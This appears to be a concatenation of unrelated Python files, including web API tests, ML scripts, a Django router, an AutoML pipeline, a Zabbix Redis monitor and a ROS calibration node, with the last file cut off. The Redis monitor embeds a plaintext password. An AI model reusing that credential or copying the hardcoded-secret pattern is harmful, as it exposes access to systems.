    def test_anonymous_gets_null_goal_if_user_has_no_goal(self):
        self.make_participant('alice', last_bill_result='')
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data['goal'] == None

    def test_anonymous_gets_user_goal_if_set(self):
        self.make_participant('alice', last_bill_result='', goal=1)
        data = json.loads(self.client.GET('/alice/public.json').body)
        assert data['goal'] == '1.00'

    def test_authenticated_user_gets_their_tip(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '1.00')
        raw = self.client.GET('/bob/public.json', auth_as='alice').body
        data = json.loads(raw)
        assert data['receiving'] == '1.00'
        assert data['my_tip'] == '1.00'

    def test_authenticated_user_doesnt_get_other_peoples_tips(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob', last_bill_result='')
        carl = self.make_participant('carl', last_bill_result='')
        dana = self.make_participant('dana')
        alice.set_tip_to(dana, '1.00')
        bob.set_tip_to(dana, '3.00')
        carl.set_tip_to(dana, '12.00')
        raw = self.client.GET('/dana/public.json', auth_as='alice').body
        data = json.loads(raw)
        assert data['receiving'] == '16.00'
        assert data['my_tip'] == '1.00'

    def test_authenticated_user_gets_zero_if_they_dont_tip(self):
        self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob', last_bill_result='')
        carl = self.make_participant('carl')
        bob.set_tip_to(carl, '3.00')
        raw = self.client.GET('/carl/public.json', auth_as='alice').body
        data = json.loads(raw)
        assert data['receiving'] == '3.00'
        assert data['my_tip'] == '0.00'

    def test_authenticated_user_gets_self_for_self(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '3.00')
        raw = self.client.GET('/bob/public.json', auth_as='bob').body
        data = json.loads(raw)
        assert data['receiving'] == '3.00'
        # A participant viewing their own page gets the sentinel 'self'.
        assert data['my_tip'] == 'self'

    def test_access_control_allow_origin_header_is_asterisk(self):
        self.make_participant('alice', last_bill_result='')
        response = self.client.GET('/alice/public.json')
        assert response.headers['Access-Control-Allow-Origin'] == '*'

    def test_jsonp_works(self):
        alice = self.make_participant('alice', last_bill_result='')
        bob = self.make_participant('bob')
        alice.set_tip_to(bob, '3.00')
        # GxT issues the request without asserting a 200 status.
        raw = self.client.GxT('/bob/public.json?callback=foo', auth_as='bob').body
        assert raw == '''\
foo({
"avatar": null,
"elsewhere": {
"github": {
"id": %(elsewhere_id)s,
"user_id": "%(user_id)s",
"user_name": "bob"
}
},
"giving": "0.00",
"goal": null,
"id": %(user_id)s,
"my_tip": "self",
"npatrons": 1,
"number": "singular",
"on": "gratipay",
"receiving": "3.00",
"username": "bob"
})''' % dict(user_id=bob.id, elsewhere_id=bob.get_accounts_elsewhere()['github'].id)
|
import numpy
import theano.tensor as T
from theano import function
# Two symbolic double-precision scalars, inputs for a compiled theano function.
x = T.dscalar('x')
y = T.dscalar('y')
|
import json
import pytest
from girder.models.item import Item
from pytest_girder.assertions import assertStatusOk
from geometa.constants import GEOMETA_FIELD
from ..utils import uploadSampleData
@pytest.mark.plugin('geometa')
def test_geometa_create_endpoint(server, admin, fsAssetstore):
    """PUT /item/{id}/geometa recreates geo metadata on demand."""
    uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
    document = Item().load(uploaded['itemId'], user=admin)
    # Remove geometa from item and recreate it using the endpoint
    # as opposed to relying on upload event
    del document[GEOMETA_FIELD]
    Item().updateItem(document)
    resp = server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
                          method='PUT',
                          user=admin)
    assertStatusOk(resp)
    document = Item().load(uploaded['itemId'], user=admin)
    assert GEOMETA_FIELD in document
@pytest.mark.plugin('geometa')
# A single minimal-but-valid raster geometa document.
@pytest.mark.parametrize('geometa', [
    (
        {
            'crs': '',
            'type_': 'raster',
            'bounds': {
                "type": "Polygon",
                "coordinates": [[
                    [-97.73400217294692, 40.17914177196121],
                    [-97.73371249437332, 40.17914177196121],
                    [-97.73371249437332, 40.17936924284886],
                    [-97.73400217294692, 40.17936924284886],
                    [-97.73400217294692, 40.17914177196121]
                ]]
            },
            'nativeBounds': {'left': 1,
                             'right': 1,
                             'top': 2,
                             'bottom': 2}
        }
    )
])
def test_geometa_create_with_user_data(server, admin, fsAssetstore, geometa):
    """A caller-supplied geometa document is stored verbatim on the item."""
    uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
    server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
                   params={'geometa': json.dumps(geometa)},
                   method='PUT',
                   user=admin)
    document = Item().load(uploaded['itemId'], user=admin)
    assert document[GEOMETA_FIELD] == geometa
@pytest.mark.plugin('geometa')
@pytest.mark.parametrize('geometa', [
    ({'foo': 'bar'})
])
def test_bad_geometa_fails(server, admin, fsAssetstore, geometa):
    """A document missing the required schema fields is rejected with 400."""
    uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
    resp = server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
                          params={'geometa': json.dumps(geometa)},
                          method='PUT',
                          user=admin)
    assert resp.status == '400 Bad Request'
@pytest.mark.plugin('geometa')
# Valid raster document plus one extra custom key ('foobar').
@pytest.mark.parametrize('geometa', [
    (
        {
            'crs': '',
            'type_': 'raster',
            'bounds': {
                "type": "Polygon",
                "coordinates": [[
                    [-97.73400217294692, 40.17914177196121],
                    [-97.73371249437332, 40.17914177196121],
                    [-97.73371249437332, 40.17936924284886],
                    [-97.73400217294692, 40.17936924284886],
                    [-97.73400217294692, 40.17914177196121]
                ]]
            },
            'nativeBounds': {'left': 1,
                             'right': 1,
                             'top': 2,
                             'bottom': 2},
            'foobar': 'barfoo'
        }
    )
])
def test_geometa_custom_data_is_returned(server, admin, fsAssetstore, geometa):
    """Extra user keys survive the round trip through the geometa API."""
    uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
    server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
                   params={'geometa': json.dumps(geometa)},
                   method='PUT',
                   user=admin)
    response = server.request(
        path='/item/{}/geometa'.format(uploaded['itemId']),
        user=admin)
    assert 'foobar' in response.json.keys()
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from typing import List, Optional, Union
from airbyte_cdk.models import FailureType
from airbyte_cdk.utils.traced_exception import AirbyteTracedException
from .source_files_abstract.file_info import FileInfo
class S3Exception(AirbyteTracedException):
    """Traced exception that prefixes the offending S3 file name(s) to the
    user-facing message."""

    def __init__(
        self,
        file_info: Union[List[FileInfo], FileInfo],
        internal_message: Optional[str] = None,
        message: Optional[str] = None,
        failure_type: FailureType = FailureType.system_error,
        exception: BaseException = None,
    ):
        # Normalize a single FileInfo into a one-element list.
        file_info = (
            file_info
            if isinstance(file_info, (list, tuple))
            else [
                file_info,
            ]
        )
        file_names = ", ".join([file.key for file in file_info])
        user_friendly_message = f"""
The connector encountered an error while processing the file(s): {file_names}.
{message}
This can be an input configuration error as well, please double check your connection settings.
"""
        super().__init__(internal_message=internal_message, message=user_friendly_message, failure_type=failure_type, exception=exception)
|
from qiskit import IBMQ, Aer
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit.qasm import pi
from qiskit.extensions import U3Gate
import numpy as np
import matplotlib.pyplot as plt
import os
from rwutil import *
# Directory for the generated plot images.
OUTPUT = "output"
IBMQ.load_account()
Prov = IBMQ.get_provider(group='open')
# Backend name -> (backend object, enabled flag); only enabled entries run.
# NOTE(review): 'ibmq_london' and 'ibmq_vigo' both resolve to
# 'ibmq_qasm_simulator' -- looks like a copy-paste placeholder; confirm
# the intended hardware backends before enabling them.
BACKENDS = {
    'qasm_simulator': (Aer.get_backend('qasm_simulator'), True),
    'ibmq_qasm_simulator': (Prov.get_backend('ibmq_qasm_simulator'), False),
    'ibmq_london': (Prov.get_backend('ibmq_qasm_simulator'), False),
    'ibmq_vigo': (Prov.get_backend('ibmq_qasm_simulator'), False)
}
# Shots per circuit execution and the sweep of evolution times t.
SHOTS = 1000
T = np.linspace(0, 6.5, num=50)
def circuit(t):
    """Build a one-qubit circuit applying U3(2t, -pi/2, pi/2) and measuring."""
    qreg = QuantumRegister(1, name="q")
    creg = ClassicalRegister(1, name="c")
    qc = QuantumCircuit(qreg, creg)
    # Rotation angle grows linearly with the evolution time t.
    qc.append(U3Gate(2 * t, -pi / 2, pi / 2), [0])
    qc.measure(qreg, creg)
    return qc
# One circuit per sampled time in T.
circuits = [circuit(t) for t in T]
if not os.path.exists(OUTPUT):
    os.mkdir(OUTPUT)
# Run the sweep on every enabled backend and save both plot types.
# run_circuits / plot_circuits / plot_position_over_time come from rwutil.
for (name, (backend, enabled)) in BACKENDS.items():
    if enabled:
        results = run_circuits(circuits, backend, SHOTS, 1)
        plot_circuits(T, results)
        plt.savefig(f"{OUTPUT}/continuous_1_{name}.png")
        plot_position_over_time(T, results)
        plt.savefig(f"{OUTPUT}/continuous_1_{name}_pos.png")
        plt.show()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 25 14:55:27 2017
@author: misakawa
"""
class Typedef:
    """A type specification: a type (or tuple of types), a check predicate,
    and an error-message template with {return_or_input}/{idx_or_key}/{type}
    placeholders."""

    def __init__(self, type_, error_msg="Type of {return_or_input} {idx_or_key} should be {type}."):
        self.type_ = type_
        self.error_msg = error_msg

    def set_lambda(self, dual_callable_obj):
        """Bind a (value, type_spec) predicate as this spec's check; returns self."""
        def check(input_var):
            return dual_callable_obj(input_var, self.type_)
        self.check = check
        return self
# NEq(T): spec whose check passes when the value is NOT an instance of T.
NEq = lambda type_: Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} shouldn't be {type}.").set_lambda(
    lambda input_var, input_type : not isinstance(input_var, input_type) )
# Or(T1, T2, ...): spec whose check passes when the value's EXACT class is
# one of the given types (no subclass matching, unlike isinstance).
Or = lambda *type_:Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} should be in {type}").set_lambda(
    lambda input_var, input_type: input_var.__class__ in input_type )
def error_helper(template_msg, **kwargs):
    """Append the actual-input-type sentence to a template and format both
    with the supplied keyword arguments."""
    suffix = "The type of current input {return_or_input} is {input_var_type}."
    return '\n'.join([template_msg, suffix]).format(**kwargs)
def _check(input_var, check_type, idx = None, key = None, ret = None):
    """Validate one value against a type spec; raise TypeError on mismatch.

    check_type may be a plain type (isinstance check) or a Typedef carrying
    a custom predicate and error template.  idx/key identify the positional
    index or keyword name for the message; a truthy ret marks return-value
    checking ('return' instead of 'argument' in the message).
    """
    return_or_input = lambda :"return" if ret else "argument"
    # NOTE: error_render references _type, which is only assigned below --
    # safe because closures late-bind and error_render is never called
    # before one of the branches sets _type.
    error_render = lambda :dict(idx_or_key = key if key else idx,
                                return_or_input = return_or_input(),
                                type = _type,
                                input_var_type = input_var.__class__)
    if isinstance(check_type, Typedef):
        _type = check_type.type_
        if not check_type.check(input_var):
            raise TypeError(error_helper(check_type.error_msg, **error_render()))
    else:
        _type = check_type
        if not isinstance(input_var, check_type):
            raise TypeError(error_helper("Type of {return_or_input} {idx_or_key} should be {type}.", **error_render()))
class strict:
    """Namespace of decorators for runtime type checking of arguments and
    return values (use as @strict.args(...) / @strict.ret(...))."""

    def __new__(self):
        # Instantiating the class just yields the class itself (pure namespace).
        return strict

    def args(*typeargs : "*[, typearg]" , **typekwargs : "**dict(, kw = arg)"):
        """Decorator factory: check positional/keyword argument types on call."""
        def _1(func):
            def _2(*args, **kwargs):
                # zip stops at the shorter sequence: extra args are unchecked.
                for arg_idx, (arg,typearg) in enumerate(zip(args, typeargs)):
                    try:
                        _check(arg, typearg, idx=arg_idx)
                    except TypeError as e:
                        # Re-raised to shorten the traceback to the call site.
                        raise TypeError(e)
                for key in kwargs:
                    try:
                        _check(kwargs[key], typekwargs[key], key=key)
                    except TypeError as e:
                        raise TypeError(e)
                return func(*args,**kwargs)
            return _2
        return _1

    def ret(*typerets : "*[, typearg]"):
        """Decorator factory: check the return value's type(s) after the call.

        NOTE(review): _check is called without ret=True here, so mismatch
        messages say 'argument' even for return values -- confirm intent.
        """
        def _1(func):
            def _2(*args, **kwargs):
                ret = func(*args, **kwargs)
                if len(typerets) > 1:
                    # Multiple specs: treat the return as a tuple, check each item.
                    for ret_idx,(ret_i, typeret) in enumerate(zip(ret, typerets)):
                        try:
                            _check(ret_i, typeret, idx=ret_idx)
                        except TypeError as e:
                            raise TypeError(e)
                else:
                    try:
                        _check(ret, typerets[0], idx=0)
                    except TypeError as e:
                        raise TypeError(e)
                return ret
            return _2
        return _1
|
# Multi-variable linear regression2
import tensorflow as tf
tf.set_random_seed(777)
# Data
# x1 x2 x3
x_data = [[73., 80., 75.], # (5,3)
          [93., 88., 93.],
          [89., 91., 90.],
          [96., 98., 100.],
          [73., 66., 70.]]
y_data = [[152.], # 5,1
          [185.],
          [180.],
          [196.],
          [142.]]
# Tensor model
# placehodlers for a tensor that will be always fed
x = tf.placeholder(tf.float32, shape=[None, 3]) # input_dim = 3: the number of columns in x
y = tf.placeholder(tf.float32, shape=[None, 1]) # output = 1: the number of columns in y
# None in shape=[None, 1] -> accepts any number of rows (batch size)
w = tf.Variable(tf.random_normal([3, 1]), name='weight') # tf.random_normal([3,1]) => input_dim=3, output = 1
b= tf.Variable(tf.random_normal([1]), name='bias') # tf.random_normal([1]) => output=1
hypothesis = tf.matmul(x,w) + b # tf.matmul() -> matrix product (x1*w1 + x2*w2 + x3*w3)
'''
x1 x2 x3 * w = tf.matmul()
[[73., 80., 75.], [[w1], [[73*w1 + 80*w2 + 75*w3],
[93., 88., 93.], [93*w1 + 88*w2 + 93*w3],
[89., 91., 90.], * [w2], = [89*w1 + 91*w2 + 90*w3],
[96., 98., 100.], [96*w1 + 98*w2 + 100*w3],
[73., 66., 70.]] [w3]] [73*w1 + 66*w2 + 70*w3]]
'''
# Mean squared error loss, minimized by plain gradient descent.
cost = tf.reduce_mean(tf.square(hypothesis - y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-5)
train = optimizer.minimize(cost)
# Launch the graph in a session
sess = tf.Session()
# Initializes global variables in the graph
sess.run(tf.global_variables_initializer())
for step in range(2001):
    cost_val ,hy_val, _ = sess.run(
        [cost, hypothesis, train],
        feed_dict={x:x_data, y:y_data}
    )
    if step % 10 == 0:
        print(step, 'Cost:', cost_val, '\nPrediction\n', hy_val) # hy_val is the prediction (y_predict) -- it should be close to y
'''
2000 Cost: 3.178887
Prediction
[[154.3593 ]
[182.95117]
[181.85052]
[194.3554 ]
[142.03566]]
'''
import tensorflow as tf
import skimage.color, skimage.transform
# Hyper-parameters
# Experiment name
exp_name = 'DDQN-SpaceInvaders'
# Environment
env_name = 'SpaceInvaders-v0'
# Whether to train
train = True
# Whether to plot
plot = True
# Whether to get stats
stats = False
# Whether to render
render = False
# Whether to save videos while getting stats
capture_videos = False
# Feature extractor ('linear', 'fc', 'conv')
extractor_type = 'conv'
# Whether to use the experience replay
use_replay = True
# Standard DQN or dueling
dueling = False
# Standard or DDQN
double = True
# Weights initializer
kernel_initializer = tf.contrib.layers.xavier_initializer()
bias_initializer = tf.constant_initializer(0.0)
# Model directory
model_path = 'tmp/'
# Maximum iterations for training
max_iterations = 2000000
# Gamma
discount_factor = 0.99
# Learning rate
lr = 0.0001
# Epsilon greedy exploration: epsilon is annealed linearly from
# initial_exploration to final_exploration over final_exploration_frame steps.
initial_exploration = 1.
final_exploration = 0.1
final_exploration_frame = max_iterations / 2
# Negative per-step delta added to epsilon during annealing.
exploration_change_rate = (final_exploration - initial_exploration) * (1. / final_exploration_frame)
test_exploration = 0.1
# Batch size
batch_size = 32
# Experience replay memory size
replay_memory_size = 250000
# Number of burn in actions
burn_in = 10000
# Helper functions
# Tensorflow FC layer
def fc_layer(name, input, input_size, num_units, activation=tf.nn.relu):
    """Fully-connected layer: activation(input @ W + b), or the raw
    pre-activation when activation is None.  Variables live in scope `name`
    and use the module-level initializers."""
    with tf.variable_scope(name):
        weights = tf.get_variable('weights', shape=[input_size, num_units], initializer=kernel_initializer)
        bias = tf.get_variable('bias', shape=[num_units], initializer=bias_initializer)
        if activation is not None:
            return activation(tf.matmul(input, weights) + bias)
        else:
            return tf.matmul(input, weights) + bias
# Tensorflow conv layer for space invaders
def conv_layer(name, input, shape, stride, activation=tf.nn.relu):
    """2-D conv layer with VALID padding; `shape` is [kh, kw, in_ch, out_ch]
    and `shape[3]` sizes the bias."""
    with tf.variable_scope(name):
        conv_weights = tf.get_variable('kernel', shape=shape, initializer=kernel_initializer)
        conv_bias = tf.get_variable('bias', shape=[shape[3]], initializer=bias_initializer)
        return activation(tf.nn.conv2d(input, conv_weights, strides=(1, stride, stride, 1), padding='VALID') + conv_bias)
# Feature extractors
# 'fc' for DQNs
def fc_extractor(input, input_size):
    """Three stacked 30-unit ReLU layers; returns the final 30-dim features."""
    hidden1 = fc_layer('hidden1', input, input_size=input_size, num_units=30)
    hidden2 = fc_layer('hidden2', hidden1, input_size=30, num_units=30)
    hidden3 = fc_layer('hidden3', hidden2, input_size=30, num_units=30)
    return hidden3
# 'conv' for Space Invaders
def conv_extractor(input):
    """DQN-style conv stack producing 512-dim features.

    The 7*7*64 flatten implies an 84x84x4 input: 84 -> 20 -> 9 -> 7 under
    the three VALID convolutions below.
    """
    # Scale uint8 pixel values from [0, 255] to [-1, 1].
    normalize = (input - (255.0 / 2)) / (255.0 / 2)
    conv1 = conv_layer('conv1', normalize, shape=[8, 8, 4, 32], stride=4)
    conv2 = conv_layer('conv2', conv1, shape=[4, 4, 32, 64], stride=2)
    conv3 = conv_layer('conv3', conv2, shape=[3, 3, 64, 64], stride=1)
    flatten = tf.reshape(conv3, (-1, 7 * 7 * 64))
    fc = fc_layer('fc', flatten, input_size=7 * 7 * 64, num_units=512)
    return fc
# Choice of extractor
def extractor(input, input_size, type):
    """Dispatch to a feature extractor; returns (features, feature_size).

    'linear' passes the input through unchanged; anything other than
    'linear'/'fc' falls through to the conv extractor.
    """
    if type == 'linear':
        return input, input_size
    elif type == 'fc':
        return fc_extractor(input, input_size), 30
    else:
        return conv_extractor(input), 512
# Q estimation from features
def estimate_Q(input, input_size, num_actions, dueling=False):
    """Estimate per-action Q values from features.

    With dueling=True, uses separate value and advantage streams combined
    as Q = V + (A - mean(A)); otherwise a single linear head.
    """
    if dueling:
        value = fc_layer('value', input, input_size=input_size, num_units=1, activation=None)
        advantage = fc_layer('advantage', input, input_size=input_size, num_units=num_actions, activation=None)
        # Subtract the mean advantage for identifiability of V and A.
        Q = (advantage - tf.reshape(tf.reduce_mean(advantage, axis=1), (-1, 1))) + tf.reshape(value, (-1, 1))
    else:
        Q = fc_layer('Q', input, input_size=input_size, num_units=num_actions, activation=None)
    return Q
# Process space invaders frames
def preprocess(frame):
    """Resize an RGB game frame to 84x84 and convert it to grayscale."""
    return skimage.color.rgb2gray(skimage.transform.resize(frame, (84, 84)))
import numpy as np
def o2satv2a(salinity: np.ndarray, temp: np.ndarray) -> np.ndarray:
    """
    Calculate O2 concentration at saturation.

    Evaluates a polynomial fit in scaled temperature Ts (this looks like a
    Garcia & Gordon style solubility fit -- confirm against the source of
    the coefficients).

    :param salinity: practical salinity; scalar or array
    :param temp: water temperature in deg C; scalar or array
    :return: O2 saturation concentration in mL O2 / L
    """
    # Coefficients for units of mL O2 / L, highest order first as expected
    # by np.polyval (which applies the same Horner scheme as the original
    # hand-nested expressions).
    a_coeffs = [1.71069, 9.78188e-01, 4.80299, 3.99063, 3.22400, 2.00856]
    b_coeffs = [-4.29155e-03, -6.90358e-03, -6.93498e-03, -6.24097e-03]
    c0 = -3.11680e-07
    # Scaled temperature Ts from T (deg C).
    ts = np.log((298.15 - temp) / (273.15 + temp))
    a = np.polyval(a_coeffs, ts)
    b = np.polyval(b_coeffs, ts)
    return np.exp(a + salinity * (b + salinity * c0))
|
from django.urls import path, include
from django.conf.urls import url
from .views import *
from rest_framework import routers
from .views1 import AssetsView, RecipesView, PicturesView
from rest_framework_swagger.views import get_swagger_view
# Browsable Swagger schema for the API.
schema_view = get_swagger_view(title='Recipes API')

# Every viewset is registered under its URL prefix on one DRF router.
router = routers.DefaultRouter()
_ROUTE_TABLE = (
    ('assets', AssetsView),
    ('branchrecipes', BranchRecipesView),
    ('classificationtext', ClassificationsTextView),
    ('ingredientset', IngredientSetView),
    ('ingredientsetingredient', IngredientSetIngredientView),
    ('ingredientsetnutrition', IngredientSetNutritionView),
    ('ingredientsource', IngredientSourceView),
    ('ingredienttype', IngredientTypeView),
    ('keywordmaster', KeywordMasterView),
    ('kraftrecipes', KraftRecipesView),
    ('languages', LanguagesView),
    ('recipeingredientsattribute', RecipeIngredientAttributeView),
    ('recipeingredientlinkattribute', RecipeIngredientLinkAttributeView),
    ('recipeingredients', RecipeIngredientsView),
    ('recipekeywords', RecipeKeywordsView),
    ('recipenutrio', RecipeNutrioView),
    ('recipenutritionexchangeheading', RecipeNutritionExchangeHeadingView),
    ('recipephotos', RecipePhotosView),
    ('recipeproducts', RecipeProductsView),
    ('recipetaxonomy', RecipeTaxonomyView),
    ('recipetips', RecipeTipsView),
    ('taxonomy', TaxonomyView),
    ('taxonomytype', TaxonomyTypeView),
    ('taxonomytyperesource', TaxonomyTypeResourceView),
    ('pictureformats', PicturesView),
    ('v0.1', RecipesView),
)
for _prefix, _viewset in _ROUTE_TABLE:
    router.register(_prefix, _viewset)

urlpatterns = [
    path('', include(router.urls)),
    path(r'swagger-docs/', schema_view),
]
|
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Makes a prediction using the AutoML Tables model specified in the config.
Assumes that a model with the specified display name has already been trained,
and that the features for prediction have been generated. Prediction
jobs typically take 5-25 minutes to complete, based on the volume of data.
See https://cloud.google.com/automl-tables/docs/predict-batch for details.
"""
import logging
import sys
import google.api_core.exceptions
from google.cloud import automl_v1beta1 as automl
from google.cloud import bigquery
import utils
logging.basicConfig(level=logging.DEBUG)
def main():
    """Executes batch prediction using a model trained on AutoML.
    Uses parameters specified in the configuration file, to determine the
    read and write locations for features and predictions.
    See the configuration file for more details.
    1. Runs batch prediction operation on AutoML service.
    2. Copies contents of the dataset autogenerated by AutoML into the
        specified dataset.
    3. Copies failed predictions to a new table unless all succeeded.
    4. Deletes the autogenerated dataset if the user has permissions.
    """
    config_path = utils.parse_arguments(sys.argv).config_path
    config = utils.read_config(config_path)
    # Defining subconfigs explicitly for readability.
    global_config = config['global']
    # Authenticate using AutoML service account credentials.
    automl_client = automl.TablesClient(
        project=global_config['destination_project_id'],
        region=global_config['automl_compute_region'],
    )
    # Authenticate using Application Default Credentials.
    bq_client = bigquery.Client(
        project=global_config['destination_project_id'],
    )
    # Batch prediction operation is a Long Running Operation, .result() performs
    # a synchronous wait for the prediction to complete before progressing.
    # Input URI is the full path of the table of features for prediction, and
    # output URI is the full path of the project to write predictions to.
    # See https://cloud.google.com/automl-tables/docs/predict-batch for details.
    batch_prediction_operation = automl_client.batch_predict(
        bigquery_input_uri='bq://{}.{}.{}'.format(
            global_config['destination_project_id'],
            global_config['destination_dataset'],
            global_config['features_predict_table']),
        bigquery_output_uri='bq://{}'.format(
            global_config['destination_project_id']),
        model_display_name=global_config['model_display_name'],
    )
    # Block until the prediction job finishes (typically 5-25 minutes).
    batch_prediction_operation.result()
    # AutoML generates a new dataset in the project with a destination that is
    # not user specified, and writes predictions and failed predictions to
    # "predictions" and "errors" respectively. A failed prediction, for example,
    # may be the result of a numeric column that received a string. The batch
    # prediction response contains the dataset uri with format
    # "bq://project_id.output_dataset".
    automl_dataset_id = (
        batch_prediction_operation
        .metadata
        .batch_predict_details
        .output_info
        .bigquery_output_dataset
    ).split('bq://')[-1]
    predictions_table = bq_client.get_table(automl_dataset_id + '.predictions')
    failed_predictions_table = bq_client.get_table(automl_dataset_id + '.errors')
    # Copy predictions to dataset, fails if table already exists.
    bq_client.copy_table(
        sources=predictions_table,
        destination='{}.{}.{}'.format(
            global_config['destination_project_id'],
            global_config['destination_dataset'],
            global_config['predictions_table']),
    ).result()
    # Copy the failed predictions table only if it is not empty.
    if failed_predictions_table.num_rows > 0:
        bq_client.copy_table(
            sources=failed_predictions_table,
            destination='{}.{}.{}'.format(
                global_config['destination_project_id'],
                global_config['destination_dataset'],
                global_config['failed_predictions_table']),
        ).result()
        logging.warning("%d rows in the batch prediction job failed.",
                        failed_predictions_table.num_rows)
    # Delete the dataset created by AutoML, catches Forbidden exception raised if
    # account does not have BQ Data Owner permissions.
    try:
        bq_client.delete_dataset(automl_dataset_id, delete_contents=True)
    except google.api_core.exceptions.Forbidden:
        logging.warning(
            "Failed to delete BQ dataset generated by AutoML batch prediction."
            " Requires BQ Data Owner permissions to delete.")
# Script entry point.
if __name__ == '__main__':
    main()
|
# B. Box Fitting
# Greedy bin packing: for each box of capacity W, repeatedly place the largest
# remaining item that still fits; count how many boxes are needed.
from collections import Counter, OrderedDict
for _ in range(int(input())):
    n, W = map(int, input().split())
    inp = list(map(int, input().split()))
    # Item multiset keyed by weight, keys in descending order (largest first).
    mp = OrderedDict(Counter(sorted(inp, reverse=True)))
    ans = 0
    while n > 0:
        # Fill one box: take the largest fitting weight as long as any remain.
        w_left = W
        for w in mp:
            while w <= w_left and mp[w] > 0:
                w_left -= w
                mp[w] -= 1
                n -= 1
        ans += 1
    print(ans)
|
#!/usr/bin/env python
#coding:utf-8
#Author Fleece_Lin Mail: linuxlzy@163.com QQ: 594621466
# Zabbix external check that reports one Redis metric per invocation.
# NOTE: Python 2 only ("print x" statements and "except Exception, e" syntax).
import redis
import sys
# Metric names this script is allowed to report.
keyindex = ['used_memory', 'used_memory_rss', 'mem_fragmentation_ratio', 'blocked_clients', 'connected_clients',
            'connected_slaves',
            'instantaneous_ops_per_sec', 'keyspace_hits', 'keyspace_misses', 'keypace_query_total_count',
            'keyspace_hits_rate', 'status']
returnval = None
def zabbix_faild():
    # Tell Zabbix the item is unsupported, then exit non-zero.
    print "ZBX_NOTSUPPORTED"
    sys.exit(2)
if len(sys.argv) != 2 :
    zabbix_faild()
try:
    # NOTE(review): credentials are hardcoded and the host '10.10.3.' looks like
    # a truncated IP — verify and move these to configuration.
    conn=redis.Redis(host='10.10.3.',port='6379',password='LSy9OetOxT7GiItO')
except Exception, e:
    zabbix_faild()
if sys.argv[1] in keyindex:
    if sys.argv[1] == 'status':
        # Liveness: 1 if the server answers PING, else 0.
        try:
            conn.ping()
            returnval = 1
        except Exception,e:
            returnval = 0
    elif sys.argv[1] == 'keyspace_hits_rate':
        merit = conn.info()
        keyspace_hits_count = float(merit['keyspace_hits'])
        keyspace_misses_count = float(merit['keyspace_misses'])
        # NOTE(review): raises ZeroDivisionError when hits + misses == 0
        # (fresh server) — Zabbix then sees no value; consider guarding.
        keyspace_hits_rate = keyspace_hits_count / (keyspace_hits_count + keyspace_misses_count) * 100
        returnval = keyspace_hits_rate
    elif sys.argv[1] == 'keypace_query_total_count':
        merit = conn.info()
        keyspace_hits_count = merit['keyspace_hits']
        keyspace_misses_count = merit['keyspace_misses']
        keypace_query_total_count = keyspace_hits_count + keyspace_misses_count
        returnval = keypace_query_total_count
    else:
        # Any other whitelisted key is read straight from INFO.
        merit = conn.info()
        try:
            returnval = merit[unicode(sys.argv[1])]
        except Exception,e:
            pass
if returnval == None:
    zabbix_faild()
else:
    print returnval
|
#!/usr/bin/python
'''
Created on Sun Octoer 12, 2019
@author: 2.009 Purple
This subscribes to the data published by multiple_fsr.py and calibrates for a sepecific user
'''
import rospy
import getch
import serial
from fsr_readout.msg import forces
from std_msgs.msg import (
Bool,
String,
Int32,
Float64,
Float64MultiArray,
UInt16,
Empty
)
class Calibrate_and_Measure():
    """ROS node that calibrates FSR force readings for a specific user,
    then (eventually) provides squat feedback.  NOTE: Python 2 (raw_input)."""
    def __init__(self):
        #Name the node
        rospy.init_node('calibration', anonymous=True)
        self.calibrated = False          # becomes True once calibration is accepted
        self.first_loop = False          # guards the one-time "begin squatting" prompt
        self.data_collection = []        # raw [heel, inner, outer] samples during calibration
        self.previous_forces = [0,0,0]   # last sample, used to detect stepping off the pad
        rospy.loginfo('Need to calibrate first')
        rospy.loginfo('Please step onto the pad and press enter when done')
        #The script will not continue unless the user presses enter
        user = raw_input()
        rospy.Subscriber('forces', forces, self.cb_forceReadout)
    def cb_forceReadout(self, data):
        '''
        Collects the raw data from the multiple_fsr script and puts it into a list
        '''
        #Defining the parts of the list
        # NOTE(review): this local list shadows the imported `forces` message type.
        forces = []
        forces.append(data.heel)
        forces.append(data.inner)
        forces.append(data.outer)
        print(forces)
        #Check to see if the user was calibrated; if not calibrated, calibrate; if calibrated, be prepared to provide feedback
        if not self.calibrated:
            # print('here')
            self.calibrate(forces)
        else:
            self.feedback()
    def calibrate(self, forces):
        '''
        This function is for calibrating for a specific user.
        It asks the user to squat and collects the data accordingly.
        Lastly, it measures percentages throughout different points of the squat to see weight distribution.
        '''
        if not self.first_loop:
            rospy.loginfo('Begin squatting and get off pad when done')
            self.first_loop = True
        #Defining list for entire data_collection during calibration
        # rospy.loginfo(forces)
        self.data_collection.append(forces)
        # All-zero forces after non-zero forces => the user stepped off the pad.
        if sum(forces) == 0 and sum(self.previous_forces)!=0:
            rospy.loginfo(self.data_collection)
            rospy.loginfo("Would you like to recalibrate? Enter 'yes' or 'no'.")
            user = raw_input()
            if user == 'yes':
                # Reset all calibration state and start over.
                self.calibrated = False
